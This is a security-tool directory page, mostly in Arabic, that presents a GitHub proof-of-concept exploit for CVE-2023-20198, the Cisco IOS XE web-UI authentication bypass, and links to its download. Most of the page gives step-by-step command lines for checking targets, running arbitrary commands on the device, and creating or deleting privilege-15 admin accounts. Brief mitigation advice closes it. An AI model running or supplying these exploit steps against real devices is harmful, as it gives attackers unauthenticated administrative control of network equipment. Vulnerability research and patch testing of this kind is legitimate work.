Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-20198-Exploit — استغلال إثبات المفهوم لـ CVE-2023-20198، وهي ثغرة تجاوز المصادقة تؤثر على واجهة الويب الخاصة بـ Cisco IOS XE | Kitploit
أدوات/GitHubGitHub/gill-singh-a/cve-2023-20198-exploit
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubgill-singh-a/cve-2023-20198-exploit

CVE-2023-20198-Exploit

استغلال إثبات المفهوم لـ CVE-2023-20198، وهي ثغرة تجاوز المصادقة تؤثر على واجهة الويب الخاصة بـ Cisco IOS XE

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
11منذ 7 أشهرلم تتم المراجعة بعد

تجاوز المصادقة في Cisco IOS XE (CVE-2023-20198)

يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال الثغرة CVE-2023-20198، وهي ثغرة تجاوز مصادقة تؤثر على واجهة الويب الخاصة بـ Cisco IOS XE.

تسمح هذه الثغرة للمهاجمين غير المصادق عليهم بتنفيذ أوامر عشوائية على أجهزة Cisco المعرضة للخطر عبر طلبات SOAP مصممة بعناية، مما قد يؤدي إلى اختراق كامل للجهاز، بما في ذلك تنفيذ أوامر عن بُعد (RCE) وإنشاء/حذف مستخدمين إداريين.

نظرة عامة على الثغرة

  • CVE: CVE-2023-20198

  • المنتج المتأثر: Cisco IOS XE (واجهة الويب / واجهة WSMA)

  • الأثر:

    • تجاوز المصادقة
    • تنفيذ أوامر عن بُعد (RCE)
    • إنشاء مستخدمين غير مصرح بهم
    • حذف مستخدمين غير مصرح بهم
  • ناقل الهجوم: الشبكة (HTTP/HTTPS)

  • الصلاحيات المطلوبة: لا شيء (بدون مصادقة)

سبب هذه الثغرة هو المعالجة غير السليمة للمصادقة في نقطة نهاية وكيل إدارة خدمات الويب (WSMA)، مما يسمح للمهاجمين بتجاوز المصادقة باستخدام طلبات HTTP مصممة بعناية.

المتطلبات

  • Python 3.x
  • requests
  • colorama

تثبيت التبعيات:

pip install -r requirements.txt

الاستخدام

usage: main.py [-h] -t TARGET [-c] [-C CMD] [-a] [-d] [-u USERNAME] [-p PASSWORD]

Authentication Bypass Exploit for Cisco IOS XE Devices (CVE-2023-20198)

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Cisco IOS XE Device
  -c, --check           Check if the Target is vulnerable to CVE-2023-20198
  -C CMD, --cmd CMD     Cisco IOS XE Command to Execute
  -a, --add             Add New Username and Password
  -d, --delete          Delete existing User
  -u USERNAME, --username USERNAME
                        Username for Account Creation
  -p PASSWORD, --password PASSWORD
                        Password for Account Creation (Random Password Generated if not Provided)

الاستخدام

خيارات سطر الأوامر

الخيارالوصف
-t, --targetجهاز Cisco IOS XE المستهدف (مطلوب)
-c, --checkالتحقق مما إذا كان الهدف معرضًا للثغرة
-C, --cmdتنفيذ أمر من أوامر Cisco IOS XE
-a, --addإضافة مستخدم إداري جديد
-d, --deleteحذف مستخدم موجود
-u, --usernameاسم المستخدم لإنشاء/حذف الحساب
-p, --passwordكلمة مرور الحساب الجديد (عشوائية إذا لم تُقدم)

التحقق من الثغرة

تحقق مما إذا كان الهدف معرضًا للثغرة:

python3 exploit.py -t https://<TARGET-IP> -c

التحقق من الثغرة

إذا كان الهدف معرضًا للثغرة، ستقوم الأداة تلقائيًا باكتشاف نقطة نهاية WSMA القابلة للاستغلال وعرض تفاصيل الجهاز.

تنفيذ الأوامر عن بُعد

تنفيذ الأوامر على الجهاز المعرض للخطر:

python3 exploit.py -t https://<TARGET-IP> -C "<COMMAND>"

مثال:

python3 exploit.py -t https://<TARGET-IP> -C "show running | include username"

الاستغلال

إضافة مستخدم إداري

إنشاء مستخدم إداري بصلاحية 15 جديد:

python3 exploit.py -t https://<TARGET-IP> -a -u cisco -p kaptaan

إنشاء الحساب

إذا لم يتم توفير كلمة مرور، يقوم السكربت بتوليد كلمة مرور عشوائية آمنة تلقائيًا.

الوصول إلى واجهة الويب

باستخدام الحساب الذي تم إنشاؤه حديثًا، يمكنك الوصول إلى واجهة الويب الخاصة بالجهاز

واجهة الويب

حذف مستخدم موجود

حذف مستخدم موجود:

python3 exploit.py -t https://<TARGET-IP> -d -u cisco

حذف الحساب

الاكتشاف والتخفيف

  • قم بترقية Cisco IOS XE إلى أحدث إصدار مُصحح

  • عطّل واجهة الويب إذا لم تكن مطلوبة:

    no ip http server
    no ip http secure-server
    
  • قيّد وصول الإدارة عبر قوائم التحكم بالوصول (ACLs)

المراجع

  • نشرة Cisco الأمنية — CVE-2023-20198
  • NVD: CVE-2023-20198
  • توثيق Cisco IOS XE WSMA
  • تقارير مجتمع أبحاث الأمن
تنزيل الأداة